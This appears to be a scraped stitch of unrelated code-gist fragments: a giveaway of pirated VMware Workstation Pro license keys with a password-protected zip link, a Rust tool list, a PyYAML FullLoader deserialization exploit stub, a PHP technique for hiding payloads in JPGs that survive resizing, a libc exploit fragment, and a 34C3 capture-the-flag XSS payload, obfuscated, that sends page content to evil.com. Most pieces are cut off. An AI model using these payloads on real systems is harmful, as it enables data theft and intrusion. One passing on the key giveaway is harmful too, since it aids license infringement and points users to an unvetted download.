PurpleVibe32

Install VMWare Workstation PRO 17 (Read it right. PRO!)
Also, these keys might also work with VMWare Fusion 13 PRO. Just tested it.

Sub to me on youtube pls - PurpleVibe32
if you want more keys - call my bot on telegram. @purector_bot (THE BOT WONT REPLY ANYMORE) - Or: https://cdn.discordapp.com/attachments/1040615179894935645/1074016373228978277/keys.zip - the password in the zip is 102me.
---
This gist can get off at any time.
PLEASE, DONT COPY THIS. IF YOU FORK IT, DONT EDIT IT.
*If you have a problem comment and people will try to help you!
*No virus

sts10

A curated list of command-line utilities written in Rust

Note: I have moved this list to a proper repository. I'll leave this gist up, but it won't be updated. To submit an idea, open a PR on the repo.

Note that I have not tried all of these personally, and cannot and do not vouch for all of the tools listed here. In most cases, the descriptions here are copied directly from their code repos. Some may have been abandoned. Investigate before installing/using.

The ones I use regularly include: bat, dust, fd, fend, hyperfine, miniserve, ripgrep, just, cargo-audit and cargo-wipe.

• atuin: "Magical shell history"
• bandwhich: Terminal bandwidth utilization tool

adamczi

# pyyaml==5.3 required. Vulnerability has been fixed in 5.3.1
# More: ret2libc's report in https://github.com/yaml/pyyaml/pull/386
# Explanation: https://2130706433.net/blog/pyyaml/
from yaml import *

with open('payload.yaml','rb') as f:
  content = f.read()

data = load(content, Loader=FullLoader) # Using vulnerable FullLoader

phith0n

跑一跑微博被和谐的图

sinaimg子域名，跑一遍即可。

mozhu1024

<?php
    /*

    The algorithm of injecting the payload into the JPG image, which will keep unchanged after transformations
    caused by PHP functions imagecopyresized() and imagecopyresampled().
    It is necessary that the size and quality of the initial image are the same as those of the processed
    image.

    1) Upload an arbitrary image via secured files upload script
    2) Save the processed image and launch:

WangYihang

Works during GSoC 2018 on Metasploit project

Issues:

• Idea discuession about Add meta-shell commands
• Error message (no session) printed when ExitOnSession is set to false even session created actually
• Information field seems weird while a reverse shell session is created
• Some questions about Signal Handler and Job Control

Pull requests:

verctor

<?php

/*

$libc_ver:

beched@linuxoid ~ $ php -r 'readfile("/proc/self/maps");' | grep libc
7f3dfa609000-7f3dfa7c4000 r-xp 00000000 08:01 9831386                    /lib/x86_64-linux-gnu/libc-2.19.so

$open_php:

cgvwzq

XSS vector:
<link id=foo rel=import href=/flag(1|2)>
<script src="/feed?type=jsonp&cb=payload"></script>

<!-- superblog 1 - flag: 34C3_so_y0u_w3nt_4nd_learned_SOME_javascript_g00d_f0r_y0u -->
<script>
document.write`${Array.call`${atob`PA`}${`l`}${`i`}${`n`}${`k`}${atob`IA`}${`r`}${`e`}${`l`}${atob`PQ`}${atob`Ig`}${`p`}${`r`}${`e`}${`f`}${`e`}${`t`}${`c`}${`h`}${atob`Ig`}${atob`IA`}${`h`}${`r`}${`e`}${`f`}${atob`PQ`}${atob`Ig`}${`h`}${`t`}${`t`}${`p`}${atob`Og`}${atob`Lw`}${atob`Lw`}${`evil`}${atob`Lg`}${`com`}${atob`Og`}${atob`Lw`}${Math.random``}${`_`}${escape.call`${document.getElementsByTagName`link`.item``.import.body.innerText}`}${atob`Ig`}${atob`Pg`}`.join``}`,
</script>
  
<!-- superblog 2 - flag: 34C3_h3ncef0rth_peopl3_sh4ll_refer_t0_y0u_only_4s_th3_ES6+DOM_guru -->

csim.c

/*
 * Harbin Institute of Technology 1603002 1150810613 Qiuhao Li
 *
 * Anyone can modify this code and then redistribute it to help others.
 *
 * -std=c99
 */

#include "cachelab.h"
#include <stdio.h>	/* fopen freopen perror */

WangYihang

#!/usr/bin/env python
# encoding:utf-8
# Author : WangYihang
# Email : wangyihanger@gmail.com
# To solve HITCON-2017-WEB-BabyFirstRevenge

import requests
import hashlib

def get_global_ip():